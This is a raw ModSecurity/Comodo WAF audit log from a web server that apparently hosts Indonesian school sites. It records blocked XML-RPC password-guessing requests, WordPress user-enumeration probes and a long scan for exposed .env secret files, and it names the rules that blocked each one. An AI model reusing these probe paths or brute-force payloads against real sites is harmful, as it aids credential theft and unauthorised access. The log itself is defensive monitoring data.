bogl.no X-Real-IP: 188.225.23.170 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.23.170 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --86e10505-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix05 --86e10505-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e10505-E-- --86e10505-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.23.170 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446655812279 5581 (- - -) Stopwatch2: 1748446655812279 5581; combined=4107, p1=468, p2=3463, p3=0, p4=0, p5=104, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e10505-Z-- --84523551-A-- [28/May/2025:22:42:57 +0700] aDcvARwBHP_x2VCWa06f0gAAAMg 103.236.140.4 59068 103.236.140.4 8181 --84523551-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.23.170 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.23.170 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --84523551-C-- system.multicallmethodNamewp.getUsersBlogsparamsrizalfadilantix1212 --84523551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84523551-E-- --84523551-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.23.170 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446977104947 6175 (- - -) Stopwatch2: 1748446977104947 6175; combined=4353, p1=557, p2=3625, p3=0, p4=0, p5=101, sr=110, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84523551-Z-- --daff5a0e-A-- [28/May/2025:22:45:27 +0700] aDcvl_nnEwDNUSjDseIzNwAAAIw 103.236.140.4 59156 103.236.140.4 8181 --daff5a0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 Accept-Charset: utf-8 --daff5a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daff5a0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748447127476361 838 (- - -) Stopwatch2: 1748447127476361 838; combined=343, p1=301, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daff5a0e-Z-- --a3dd9360-A-- [28/May/2025:22:50:13 +0700] aDcwteszXCullgn3bbHIdgAAAAU 103.236.140.4 59412 103.236.140.4 8181 --a3dd9360-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.163.7.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.163.7.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3dd9360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3dd9360-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748447413339844 2627 (- - -) Stopwatch2: 1748447413339844 2627; combined=1086, p1=404, p2=658, p3=0, p4=0, p5=24, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3dd9360-Z-- --9c30454c-A-- [28/May/2025:23:15:24 +0700] aDc2nPnnEwDNUSjDseI6DwAAAI4 103.236.140.4 56790 103.236.140.4 8181 --9c30454c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.152.117.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.152.117.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9c30454c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c30454c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748448924476736 3180 (- - -) Stopwatch2: 1748448924476736 3180; combined=1397, p1=497, p2=868, p3=0, p4=0, p5=32, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c30454c-Z-- --50936e1a-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lQwAAANU 103.236.140.4 56880 103.236.140.4 8181 --50936e1a-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --50936e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50936e1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965060925 755 (- - -) Stopwatch2: 1748448965060925 755; combined=269, p1=234, p2=0, p3=0, p4=0, p5=34, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50936e1a-Z-- --23303861-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lRAAAAM8 103.236.140.4 56882 103.236.140.4 8181 --23303861-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --23303861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23303861-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965245138 677 (- - -) Stopwatch2: 1748448965245138 677; combined=264, p1=232, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23303861-Z-- --eabc8716-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lRgAAANc 103.236.140.4 56886 103.236.140.4 8181 --eabc8716-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --eabc8716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eabc8716-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965429405 803 (- - -) Stopwatch2: 1748448965429405 803; combined=293, p1=257, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eabc8716-Z-- --29ef4828-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lSAAAANQ 103.236.140.4 56890 103.236.140.4 8181 --29ef4828-B-- GET /wp-content/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --29ef4828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29ef4828-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965801245 703 (- - -) Stopwatch2: 1748448965801245 703; combined=277, p1=244, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29ef4828-Z-- --dd5e143d-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lSQAAAMU 103.236.140.4 56892 103.236.140.4 8181 --dd5e143d-B-- GET /application/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dd5e143d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd5e143d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965985307 661 (- - -) Stopwatch2: 1748448965985307 661; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd5e143d-Z-- --92764215-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lSgAAAMQ 103.236.140.4 56894 103.236.140.4 8181 --92764215-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --92764215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92764215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966169497 679 (- - -) Stopwatch2: 1748448966169497 679; combined=264, p1=229, p2=0, p3=0, p4=0, p5=34, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92764215-Z-- --fa24ae0c-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lSwAAANg 103.236.140.4 56896 103.236.140.4 8181 --fa24ae0c-B-- GET /config/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fa24ae0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa24ae0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966353661 643 (- - -) Stopwatch2: 1748448966353661 643; combined=251, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa24ae0c-Z-- --31bde32c-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lTAAAANE 103.236.140.4 56898 103.236.140.4 8181 --31bde32c-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --31bde32c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31bde32c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966537742 638 (- - -) Stopwatch2: 1748448966537742 638; combined=246, p1=215, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31bde32c-Z-- --42e01d0c-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lTgAAAMI 103.236.140.4 56902 103.236.140.4 8181 --42e01d0c-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --42e01d0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42e01d0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966908289 672 (- - -) Stopwatch2: 1748448966908289 672; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42e01d0c-Z-- --baf97566-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lTwAAAMk 103.236.140.4 56904 103.236.140.4 8181 --baf97566-B-- GET /library/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --baf97566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baf97566-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967092446 672 (- - -) Stopwatch2: 1748448967092446 672; combined=256, p1=226, p2=0, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baf97566-Z-- --ee6eac5c-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lUAAAAMM 103.236.140.4 56906 103.236.140.4 8181 --ee6eac5c-B-- GET /nextjs-app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ee6eac5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee6eac5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967276539 661 (- - -) Stopwatch2: 1748448967276539 661; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee6eac5c-Z-- --2be96e3a-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lUQAAANY 103.236.140.4 56908 103.236.140.4 8181 --2be96e3a-B-- GET /node-api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2be96e3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2be96e3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967460703 673 (- - -) Stopwatch2: 1748448967460703 673; combined=271, p1=224, p2=0, p3=0, p4=0, p5=46, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2be96e3a-Z-- --0471ec41-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lUgAAAM0 103.236.140.4 56910 103.236.140.4 8181 --0471ec41-B-- GET /vendor/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0471ec41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0471ec41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967644786 679 (- - -) Stopwatch2: 1748448967644786 679; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0471ec41-Z-- --278ec20f-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lVAAAAMw 103.236.140.4 56914 103.236.140.4 8181 --278ec20f-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --278ec20f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --278ec20f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968014887 683 (- - -) Stopwatch2: 1748448968014887 683; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 